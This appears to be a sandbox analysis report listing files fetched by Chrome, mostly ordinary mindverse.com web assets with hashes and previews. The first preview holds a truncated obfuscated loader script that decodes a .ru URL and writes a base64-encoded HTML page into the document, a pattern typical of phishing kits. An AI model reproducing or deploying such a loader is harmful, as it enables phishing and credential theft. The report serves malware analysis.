                                      Preview:<script>.YgSgDQumWP = atob("aHR0cHM6Ly9jdDVsLmFsZW9uYW5vYi5ydS9DcVVucy8=");.vRVrQWEsrH = atob("bm9tYXRjaA==");.VIQbjFzcdN = atob("d3JpdGU=");.if(YgSgDQumWP == vRVrQWEsrH){.document[VIQbjFzcdN](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1sPgo8aGVhZD4KICAgIDxsaW5rIHJlbD0iaWNvbiIgaHJlZj0iaHR0cHM6Ly9kZXZlbG9wZXJzLmNsb3VkZmxhcmUuY29tL2Zhdmljb24ucG5nIiB0eXBlPSJpbWFnZS94LWljb24iPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPgogICAgPHNjcmlwdD4KICAgIGNvbnN0IEdpd2doZ3ZkcWsgPSB7CiAgZ2V0KEhucE13SXlmT2gsIHRqZkVtTWlvamcpIHsKICAgIGNvbnN0IE1Na3ZRVlVvTUsgPSBbLi4udGpmRW1NaW9qZ10KICAgICAgLm1hcChKcHhhV0l5d3lhID0+ICsoJ+++oCcgPiBKcHhhV0l5d3lhKSkKICAgICAgLmpvaW4oJycpOwogICAgY29uc3QgS1pCaGNnWlFmbCA9IE1Na3ZRVlVvTUsucmVwbGFjZSgvLns4fS9nLCBvWVZrY3JEeGh
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:SVG Scalable Vector Graphics image
                                      Category:downloaded
                                      Size (bytes):19703
                                      Entropy (8bit):6.035262015354536
                                      Encrypted:false
                                      SSDEEP:384:+ofF+Hc9XYiF8Xzs/URODNAMs5VAqRoqBA8r9TpcSGdOSblGnga:+U2uXZFCs/URGNADV1RoqDtcrdOSbs7
                                      MD5:C12D0BB67E8964BB1F06F4F710B49F91
                                      SHA1:E60736C2B1784965A7C7B51D8BF02885E43431EE
                                      SHA-256:CB39351324BF81EB94381236B30D0C4D1466AC776FACD5993DEA06E4D3EB9A92
                                      SHA-512:D32DEAD7411B00C61EB1E252D438509BE18F97DEAC6CDED96CBDC35D47ADA55AB0BDB3FADB18D220E1309DD783BF230CF3B248C4D50E7B22643901267741D144
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/assets/onboarding/super_memory.svg
                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" fill="none" version="1.1" width="149.52000427246094" height="48" viewBox="0 0 149.52000427246094 48"><defs><pattern x="0" y="0" width="149.52000427246094" height="48" patternUnits="userSpaceOnUse" id="master_svg0_34090_089962"><image x="0" y="-6.857882723920738e-7" width="149.52000427246094" height="48.000001371576545" xlink:href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAm8AAADICAYAAAC+sAb3AAAAAXNSR0IArs4c6QAAAARzQklUCAgICHwIZIgAACAASURBVHic7d15mJzVeSb8+7y1d/WuBbXQgoSEBJLAIDtIwjYlBxsLgUlw2DzJF8jEdmYSvAwZksn32ZQyiRM7+AuE4DF4kYidIUgOEzbJwtgqsGkBRmZTC+1rd0u9r7W82znzR1W1qlu9VHXXXvfvuvq61K3qqrdEv5y7n3POcwRoSru2qoAEAsnPhcD14zwsMM7XQmO/oBReAQAt8Xeb7hUXPIaIiKhQ1K51AWhaYOQLQo0e89Q44524cLyLP1a8AilH/k5sen38x1FGRKEvoJi8uFUFk39OBLRAnl46BMSDHUMdERHlg9q9ITjyiVDXjxvKciEZ9FKCHUNdZio6vCXDmhB4sMCXMp4QAAiFLQxyREQ0U+fDmiq+MS8Z6Gy1BWCYm0pFhbeUsJbPqlq2hACGOSIiSs9IWMtnVS1bUsIcg9yFyj68FXl1bSZCDHJERJTq/Hq1IqyuzYRAiEHuvLINby
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (741), with no line terminators
                                      Category:downloaded
                                      Size (bytes):741
                                      Entropy (8bit):5.112710750142162
                                      Encrypted:false
                                      SSDEEP:12:UWqL8rX8V8/bGRrVLVk2GekT5YrcVoRYjxIRYtKRYpwXmOeq+RYpwXE/a7dyMvR3:2gb8V6uBLV0tYrcSYjxgYAYGW6CYGUA3
                                      MD5:B5F5A3F1318D060FEFEFE133B2BE3523
                                      SHA1:19B3FBAE45F770F053B50B719A31DEA9A96ACCF4
                                      SHA-256:2C794B88A54121BEDCE3EBE3E922275180A7911A9DC3EF3181BD3302D2D71C77
                                      SHA-512:503BA9950831A29F798950159CA9641739E944C96778E8EE6E32BC4E42AF27C5B0FB10B40B24A3C21C37EF31C8B85F77A6C5FD0F211282B253FD5B3C30C6A391
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/0c4a0b6f2e2caadc.css
                                      Preview:.index_scrollCardContainer__zikQI{display:flex;gap:24px;align-items:center;overflow-x:auto;scrollbar-width:none}.index_scrollButton__7yNZP{position:absolute;top:73.6px;z-index:10;display:flex;align-items:center;justify-content:center;width:24px;height:24px;color:var(--primary-dark-gray);font-size:24px;border-radius:50%;transform:translateY(-50%);cursor:not-allowed}.index_scrollButton__7yNZP.index_left__zYkBW{left:-27px}.index_scrollButton__7yNZP.index_right__RIf0V{right:-27px}.index_scrollButton__7yNZP.index_canClick__2gwuH{color:var(--primary-black);cursor:pointer}.index_scrollButton__7yNZP.index_canClick__2gwuH:hover{color:var(--primary-sub-color)}.index_scrollButton__7yNZP.index_canClick__2gwuH:active{color:var(--primary-color)}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 1754 x 1754, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):47226
                                      Entropy (8bit):7.198080079299587
                                      Encrypted:false
                                      SSDEEP:768:0oPN7qxA+UlrAuBxL2T5Xkerbr/GPJYNPGXfR6ieq5E:06ueNhLslrbbOOPGPrE
                                      MD5:C808ED2E474C484C7A7FAF992EFA7D74
                                      SHA1:DDF51639071B4D53AD13CB8ED884CD4EECDABE8F
                                      SHA-256:063E9B4C9BAA0706F0DA5521CABA32A8EB318646A78E15B1074FDA848CEAD675
                                      SHA-512:DEF9D0CA7B16B85342E5149B2149CB9395C6B01117E723A44DF45C77D0C7BC3C484E5453CE0274F6A4520804A5001504445EB1C6FA260FFFDFA8AF3721253295
                                      Malicious:false
                                      Reputation:low
                                      URL:https://frontdoorcdn.mindverse.ai/mindos-resource/front-img/crm/20240401171195143399120240319-204140.png
                                      Preview:.PNG........IHDR.............Kx......pHYs..........&.?.. .IDATx...1r[W....v..5.q.R.D.P.....4=..G....g.....IC..+...9...."%[..H`..<O.K..`..z.^..........................m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@..........B.........m......P .......@
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (8610), with no line terminators
                                      Category:downloaded
                                      Size (bytes):8618
                                      Entropy (8bit):5.487062439970389
                                      Encrypted:false
                                      SSDEEP:96:sjNePKTj+aC+XD0nXa0rrdKYI1TN68+eqe0DeZrwckZGtJkogtleZaaP9v3ORvc6:sOCjXDdF71BMeqTDeZrI8PmE6
                                      MD5:350785B8983381719A928D6AB4E5D355
                                      SHA1:184DA75CEBD264712EF174BC6C647234C328D79C
                                      SHA-256:568FB0C9324DD7351A55E1BDE174D8573F34EC10290CA8FE99BFE53014874A45
                                      SHA-512:A2C7EC95E5B8040AD9B4530EAFE527B1951CA7EA307F0C795A9F575D0981D8C11A88A4A169AF7A18EC0972F32CE193EAAA4F98C241FABBDCDFA2F6699D79769B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/app/(layout)/layout-71344319c04db0c0.js
                                      Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1540],{36220:function(e,t,r){Promise.resolve().then(r.bind(r,60853))},60853:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return p}});var n=r(57437),i=r(2265),o=r(7193),s=r(43189),a=r(75002),l=r(9257),u=r(7383),d=r(22289),c=r(35544),m=r(60429),f=r(70421),x=r.n(f);function h(){let e=(0,c.Z)(e=>e.referralUserId),{userProfile:t}=(0,u.t)("auth-model",e=>({userProfile:e.userProfile})),[r,o]=(0,i.useState)(!1);(0,i.useEffect)(()=>{e&&(0,d.hA)().then(r=>{0!==r.data.code||r.data.data||e===(null==t?void 0:t.userId)||o(!0)})},[e,t]);let s=()=>{o(!1),c.Z.getState().init()};return e?(0,n.jsx)(l.Z,{className:x().modal,footer:null,onCancel:()=>s(),open:r,children:(0,n.jsx)(m.Z,{closeModal:s,type:"pop"})}):null}var p=function(e){let{children:t}=e;return(0,n.jsx)(o.Z,{children:(0,n.jsxs)(s.Z,{children:[(0,n.jsx)(i.Suspense,{children:(0,n.jsx)(a.Z,{children:t})}),(0,n.jsx)(h,{})]})})}},7193:function(e,t,r){"use strict";var n=r(574
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (22400)
                                      Category:dropped
                                      Size (bytes):34166
                                      Entropy (8bit):5.31137644594723
                                      Encrypted:false
                                      SSDEEP:384:ddsxW5W6pCo6ckSghSCWaPy8C2rc+9B0Fa:7l5WsmP9B0s
                                      MD5:299A73115D35C5BAD0365F6C5DF3DD07
                                      SHA1:296F9BAD80D133E352EE2BF1A5B5DDD96D93B404
                                      SHA-256:3C9BE70AC5CEC094D03DB4102847D9A77C786765B8543EE540CF000478695C3C
                                      SHA-512:987E5C19A4377A212797ADA60F8187A24C6C5265ABDDD6F87749BF95BF1DD4B230F3861F8D26F6AA40FDCED0F351DF86D7328F8629629D95600078A4FD3AF99B
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/956ae0c8c2c0bec5.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/d09834458b1597d8.css" data-precedence="next"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/f76280e80fbc714a.css" data-precedence="next"/><li
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (4890), with no line terminators
                                      Category:downloaded
                                      Size (bytes):4890
                                      Entropy (8bit):5.269914090800208
                                      Encrypted:false
                                      SSDEEP:96:IuoIf4Audu/aZ5Obq0P6KreKzKtKCKKpKtAQHQ18x1y/9sl:lbK32Je45KsC1cU/Cl
                                      MD5:3D6933FD7E5DC3EBB627978392123199
                                      SHA1:3C12F410596402D7AE2BFFB230450DC19015B2C9
                                      SHA-256:A667104AEC10A22F7F521E1213A325E3A03FE8F041831CA0B0EED0576184BCAF
                                      SHA-512:98ACF4EBDD15F25D4652E496B30DED07EFC18AEC29BC03C17DA8F5FDC0EF566D0F04E47C74CD301447F99B8EAE99934563F1EB7966E75302571B4265609EB502
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/38632ad05393e4bc.css
                                      Preview:.page_loginPageMobile__ZnOoz{position:relative;width:100%;height:100vh;height:100dvh;overflow:hidden;background:linear-gradient(180deg,#e3d7f7,#dddbf6 18%,#dad6f1 55%,#d2e7e5)}.page_loginPageMobile__ZnOoz .page_loginPageMobileBgContainer__EGUKE{background:linear-gradient(180deg,#e6d7f7,rgba(215,226,247,.616) 44%,hsla(0,0%,100%,0));position:absolute;top:0;left:-25%;width:150%;height:60%}.page_loginPageMobile__ZnOoz .page_loginPageMobileBgContainer__EGUKE .page_loginPageMobileBgBig__gPDRr{position:absolute;top:80px;z-index:0;width:100%;height:80%;background:#d9cdfd;filter:blur(20px);border-radius:750px 750px 0 0}.page_loginPageMobile__ZnOoz .page_loginPageMobileBgContainer__EGUKE .page_loginPageMobileBgSmall__3fuHH{position:absolute;top:168px;z-index:0;width:100%;height:60%;filter:blur(20px);background:linear-gradient(180deg,#c1b6ff,#dcd1f3 59%,#dad6f1);border-radius:750px 750px 0 0}.page_loginPageMobile__ZnOoz .page_loginPageMobileTitle__lRAR9{position:absolute;top:30%;right:50%;z-index
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (5917), with no line terminators
                                      Category:downloaded
                                      Size (bytes):5917
                                      Entropy (8bit):5.225630865867615
                                      Encrypted:false
                                      SSDEEP:96:i3vNrZoWAXJVkOZBOw0XXknbzTiTJjfZsEHdC:i3vNrZ/6jCXkDQJDZsE9C
                                      MD5:C07F161A6DF1AFE5572F50788016AAC9
                                      SHA1:00158A1EF89C9270A4C33708B57C3F3FA91AC3F3
                                      SHA-256:B791D0180FFF403CE335E072C328F17F8F15F69BB3578C5F71C12FE05AAA01D0
                                      SHA-512:1E5C5115F682D9555861A472D3997A783AE00B5F11B9FB8B26E4D17E6086F458F8F91F057E68F1D5046C30EA2705296AE8BDCE8B2288DAB802BB8F6411348D3B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/4d9ca782e32c6d35.css
                                      Preview:.index_tips__X3ZT3{height:24px;margin-left:.5px;color:#acabb3;font-size:14px;font-family:Helvetica Neue,sans-serif;line-height:24px}.index_container__vZML3{position:relative}.index_contentTitle__fLaeH{position:relative;display:inline-block;margin-bottom:14px;padding-bottom:12px;color:var(--primary-color);font-weight:500;font-size:14px;line-height:22px}.index_contentTitle__fLaeH:after{position:absolute;right:0;bottom:0;left:0;border-bottom:2px solid var(--primary-color);content:""}.index_contentContainer__OqWi6{width:480px}.index_contentContainer__OqWi6 .index_pages__IcXB4{display:flex;flex-direction:column}.index_contentContainer__OqWi6 .index_pages__IcXB4 .index_contentDetailItem__PaEW7{margin-top:22px;color:var(--zero-point-six-black)}.index_contentContainer__OqWi6 .index_pages__IcXB4 .index_contentDetailItem__PaEW7:first-child{margin-top:0}.index_contentContainer__OqWi6 .index_pages__IcXB4 .index_contentDetailItem__PaEW7 .index_contentDetailItemTitle__LcbDT{font-size:12px;line-heigh
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:Unicode text, UTF-8 text, with very long lines (39227), with no line terminators
                                      Category:downloaded
                                      Size (bytes):39229
                                      Entropy (8bit):5.431442713017131
                                      Encrypted:false
                                      SSDEEP:768:8bq4S15oRz+y08GdyxLzjFYGS2B5g23SfpG8Dce:8JRiy08GdyFz5YF273ne
                                      MD5:033A6AADB2F639AAE4F5D82A94F60033
                                      SHA1:CAE915EA82A2B1416AC882AB4317BFF534616079
                                      SHA-256:015760A880D0245DBA586D4505118C3ADAF2353EB212138A0DB1D2AEE3DCD14C
                                      SHA-512:A95C7DBB1A4E8A6A7D7CCCDC5188BD1485EC2EECEFC2063E4ABA699B01D9ED1BCFC653EF4FC7A693E2BCC1F71319316AD68B0E8EB9FF5A9C044321ADE0677F1B
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/6494-ed88a2adc46e7b33.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6494],{73063:function(e,t,n){n.d(t,{Z:function(){return c}});var r=n(83590),o=n(2265),a={icon:{tag:"svg",attrs:{viewBox:"64 64 896 896",focusable:"false"},children:[{tag:"path",attrs:{d:"M747.4 535.7c-.4-68.2 30.5-119.6 92.9-157.5-34.9-50-87.7-77.5-157.3-82.8-65.9-5.2-138 38.4-164.4 38.4-27.9 0-91.7-36.6-141.9-36.6C273.1 298.8 163 379.8 163 544.6c0 48.7 8.9 99 26.7 150.8 23.8 68.2 109.6 235.3 199.1 232.6 46.8-1.1 79.9-33.2 140.8-33.2 59.1 0 89.7 33.2 141.9 33.2 90.3-1.3 167.9-153.2 190.5-221.6-121.1-57.1-114.6-167.2-114.6-170.7zm-105.1-305c50.7-60.2 46.1-115 44.6-134.7-44.8 2.6-96.6 30.5-126.1 64.8-32.5 36.8-51.6 82.3-47.5 133.6 48.4 3.7 92.6-21.2 129-63.7z"}}]},name:"apple",theme:"filled"},l=n(97009),c=o.forwardRef(function(e,t){return o.createElement(l.Z,(0,r.Z)({},e,{ref:t,icon:a}))})},6987:function(e,t,n){n.d(t,{ZP:function(){return i},c4:function(){return a}});var r=n(2265),o=n(65360);let a=["xxl","xl","lg","md"
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (11382), with no line terminators
                                      Category:downloaded
                                      Size (bytes):11382
                                      Entropy (8bit):5.24959765485296
                                      Encrypted:false
                                      SSDEEP:192:lsSHp5+YMLpPQ2UYb7tONg1e1LfGOb+WI39JSPfyy6ruHQQw/Zbc1/zNmUiY9jxF:lrHp5+YMLpCY7SzGOG3FdrusQIA9L6gP
                                      MD5:22F70598385BE6A439F565493FAE778E
                                      SHA1:83CD7715530A94A639A11048E1B9249FA6BE06BB
                                      SHA-256:7552B2836C2757A4C2A1F3DD8C1A0E19AD5E5AF8C2AA136D075977DCAE0F8046
                                      SHA-512:06B06741D8044FA89FF0855D9F07B37674A638AFC00925D9E54DD78D28BE563B8DDA237BAC610BAC1904017B64135DFC27BF79898A98396C68E880786F5FA7F5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/6284-efc75135f766f632.js
                                      Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6284],{59731:function(e){e.exports=function e(t,n){if(t===n)return!0;if(t&&n&&"object"==typeof t&&"object"==typeof n){if(t.constructor!==n.constructor)return!1;if(Array.isArray(t)){if((r=t.length)!=n.length)return!1;for(u=r;0!=u--;)if(!e(t[u],n[u]))return!1;return!0}if(t.constructor===RegExp)return t.source===n.source&&t.flags===n.flags;if(t.valueOf!==Object.prototype.valueOf)return t.valueOf()===n.valueOf();if(t.toString!==Object.prototype.toString)return t.toString()===n.toString();if((r=(o=Object.keys(t)).length)!==Object.keys(n).length)return!1;for(u=r;0!=u--;)if(!Object.prototype.hasOwnProperty.call(n,o[u]))return!1;for(u=r;0!=u--;){var r,u,o,i=o[u];if(!e(t[i],n[i]))return!1}return!0}return t!=t&&n!=n}},16463:function(e,t,n){var r=n(71169);n.o(r,"usePathname")&&n.d(t,{usePathname:function(){return r.usePathname}}),n.o(r,"useRouter")&&n.d(t,{useRouter:function(){return r.useRouter}}),n.o(r,"useSearchParams")&&n.d
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:PNG image data, 160 x 160, 8-bit/color RGBA, non-interlaced
                                      Category:downloaded
                                      Size (bytes):18906
                                      Entropy (8bit):7.967991230839252
                                      Encrypted:false
                                      SSDEEP:384:KTDO1fVTUj0JkBaxuXEOfHsUNABl6WajJLFdZa7S1BPc68zKPShyiUWVcmJvyYJ:wO1f1U4e4IXEOl0G5b1K6EKaOWbJ
                                      MD5:28EEFC88A0059189BF2403FF740CF67B
                                      SHA1:A07B36ED349A76F4D21B8029E5ED21070441DFF0
                                      SHA-256:FE90E26CC41ACAECEF066A5A18602275BEF8BBA92C9453AD61A326C936456630
                                      SHA-512:188232EC70F6825E62645AD350938FBF27C21BD720EB73147A5F96A243081E1C8D1F3CA8D31BDDB287A51C592D3774A0854598D7BA7255E5FCC56607AA632BF5
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-img/crm/1737439587653/mebot-avatar.png
                                      Preview:.PNG........IHDR...............g-....sRGB.........sBIT....|.d... .IDATx..{.fWY'.{.[U.J.Tq..@.b....).{-P$..{...Q...$........j.&..?.].dt.i..(.-w.q2:R.x[.......*.$.........?.s.{.....*......=g.}.9...{.{.........=..DY.o`..vK.n..`...@..:..p..a0...A....A..cQ..m;....y....'+1.N.......]..n0...7...(I.........](.......~.':/.....y'.'......2.."b....}1."<..R..."...S@y..}`..}_/.|J....n,.{...({...P.p....*qRSL.3eP.@b..*..t..1...).@.....o.....M...~{..A.;.N..!l......P.$...i?6m...O....Wa.....D..X..b>..........v.z.r.T..-j....3..3....>U..y.@.c.Q.....hW.f,.B^.j..@..-.(4..z..[....$%`&P.@j-....`.......K...n...`l.....7f.....j.6j...!..C....n...`d.hp.}&..vL.....y.@..n`..(2.E..A'VZB.....l....u..i.`.D....A."2d.W0.m.X.O..t.m.o#..d...........A.<U....-/z....5..Im..t..n..."h..p..z$-.[qG........i....\...O.iu.9..P Z,/......mf-.;..Q..32.,(...c.S.B)O=.V.W ......6.9.@>}.*.o.a....4......]f...=....W.........j....#.y....##..G.t=m.r.z...N.......W..<...Mg.....-.P...f..1...({.........Tk.$5.:V
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with very long lines (1581), with no line terminators
                                      Category:downloaded
                                      Size (bytes):1581
                                      Entropy (8bit):5.1554253627005995
                                      Encrypted:false
                                      SSDEEP:24:tmBmcLtKmlG8zFoM+VZFoM3XReeqFoM3XMIAFoM3XluByEX4FoM3XlOkuBlkSEXj:KhZRHi9RC5sTELADDuDRDDqfDgDDLWb
                                      MD5:6657E644CCE21EDC664E4E1435EF0145
                                      SHA1:9E716340AA757A08C6C03262DB8E46496DAAF44E
                                      SHA-256:B24C173FFF448E2266103CE193CB0F1EDDAB9E15BF3372BE725A2C7F390EA15D
                                      SHA-512:FBE0DB66F651449E56C4CCDE5749EFA1BB8930569F2A703A38DED6F945E5DEFA9A39793C5952FD8C96CF7528B1FCE31AD83CD49F62D361AF29A7A08D9D3B7870
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/5284e210e0a1dc49.css
                                      Preview:@keyframes index_dot-circle__q4fI_{0%{top:2px}60%{height:6px;border-radius:50%;transform:scaleX(1)}to{top:16px;height:5px;border-radius:50px 50px 25px 25px;transform:scaleX(1.5)}}@keyframes index_dot-shadow__WzJEZ{0%{transform:scaleX(.2);opacity:.4}60%{transform:scaleX(1);opacity:.7}to{transform:scaleX(1.5);opacity:1}}.index_dotsLoading___5G2V{display:flex;align-items:center;justify-content:center}.index_dotsLoading___5G2V .index_dots__rasJH{position:relative;display:inline-block;width:42px;height:20px}.index_dotsLoading___5G2V .index_dots__rasJH>div{position:absolute;width:6px;border-radius:50%;transform-origin:50%}.index_dotsLoading___5G2V .index_dots__rasJH>div.index_dotItem__LUjVi{top:2px;height:6px;background-color:var(--primary-color);animation:index_dot-circle__q4fI_ .5s ease-in infinite alternate}.index_dotsLoading___5G2V .index_dots__rasJH>div.index_dotShadow__MOgP2{top:18px;height:2px;background-color:var(--primary-sub-color);transform:scaleX(.2);opacity:.4;filter:blur(1px);a
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, ASCII text, with very long lines (13686)
                                      Category:dropped
                                      Size (bytes):20571
                                      Entropy (8bit):5.3824972394626265
                                      Encrypted:false
                                      SSDEEP:192:wUZkuan5WNjbi23Gf1Buxpudi+97G9jEJ4ImmpgG:R6uW5WNjbi2WfnGpR+1G9IH/GG
                                      MD5:96988CD88CDF56ED6ABEC9F567FD1169
                                      SHA1:14B7E24D7C23B426F87285E9555F4385BB0ADE18
                                      SHA-256:F32EF3EFC726546C4AD8CDC535019601FA01FD115FAB6691D434A93892CDCF12
                                      SHA-512:F5D4164AF6DAA7057AD5CFA413B2CF2BEF1C610B144058E527D7709B9C7C0435E38143053A7C20BF98B0FA73D324F42B46657ACBD0A5B46A2A100D8C929D2097
                                      Malicious:false
                                      Reputation:low
                                      Preview:<!DOCTYPE html><html><head><meta charSet="utf-8"/><meta charSet="utf-8"/><meta content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/643d7572cd0e36da.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/webpack-01f8cf0da3922576.js"/><script src="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/fd9d1056-0ed4dcd63e61d9b6.js" async=""></script><script src="https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/chunks/7023-0a587941e37db9aa.js" async=""></script><script src="
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):79
                                      Entropy (8bit):4.403941477424042
                                      Encrypted:false
                                      SSDEEP:3:YIzKK8LLRexA8KLClX3H8//XSI:YI1oLYxk2FM//J
                                      MD5:8230ECCF989074390F935CC383BAFABD
                                      SHA1:95CD7FD09BC5D7B7C4865DAFE4B8634ADE10F4ED
                                      SHA-256:EAA1A0FFB1B0087272EC7F726239E339CB8A1CD6EC00C2E73C6E4BD47E98F4A8
                                      SHA-512:88508CB1A00D742610453B62621DCCA4B1B2F095F4D093A04007C3AF7D5F6CD89B9C7A4864B9086EC4008FEB84ADE46251C9697F56A71B1EE303DEDC94F0AF8F
                                      Malicious:false
                                      Reputation:low
                                      Preview:{"message":"Oops, something went wrong.","code":1,"subCode":"unexpected.error"}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:downloaded
                                      Size (bytes):51
                                      Entropy (8bit):4.50803165598612
                                      Encrypted:false
                                      SSDEEP:3:GS3RnbJeJLTYWYn:GSBbJeFTkn
                                      MD5:9C711C98BFD75FDF91D32342A20D3E3F
                                      SHA1:BE7C8A61EA3DB8BD71428DAE8BC8598B8ECBC9E3
                                      SHA-256:E06B3FCF36567670FF70CDEC3086E5CFEBA5F186F5C939AB6FA9F124B438AC2A
                                      SHA-512:D0151E633B7B6D0BFC9F2BADC79DC9B8C59B32F032366CEF697BE454E811A9CB69227666A9FD8035B5D4B1343D1EEEECD2696B1BCD8B3D02FBC699BBCB983CAC
                                      Malicious:false
                                      Reputation:low
                                      URL:https://mindverseglobal.mindverse.com/front-packaged/mindcommerse/prod_k8s/packaged-files/_next/static/css/5c72df4895550c1f.css
                                      Preview:.index_lottieLoading__rRT8l{width:32px;height:32px}
                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                      Category:dropped
                                      Size (bytes):1599
                                      Entropy (8bit):5.269926860935135
                                      Encrypted:false
                                      SSDEEP:24:hY6svD+6zSU6pedQf3Zvcn1BZdAe1nCr1LTHI5z8xDhEC6S8f:3qD+2+pUAew85zsDhEC5A
                                      MD5:95629304D50230595F0961259C2C5C10
                                      SHA1:8B0A19FF819478AC6A597BE41FEDEAF687E6FDF0
                                      SHA-256:00736C7B494B79EF9AFC805D7CD55A22F9A907A236EF9302F85870D1EE5AE5B7
                                      SHA-512:1C646522CB74A6D0E50484F09BCBA0C4D5C016D680EB51FA3CA375BE45A1B95C276E13BDCE7B95ADEC08612883DD8C723C408B5A790E4B8F973650ABEB98CE1A
                                      Malicious:false
                                      Reputation:low
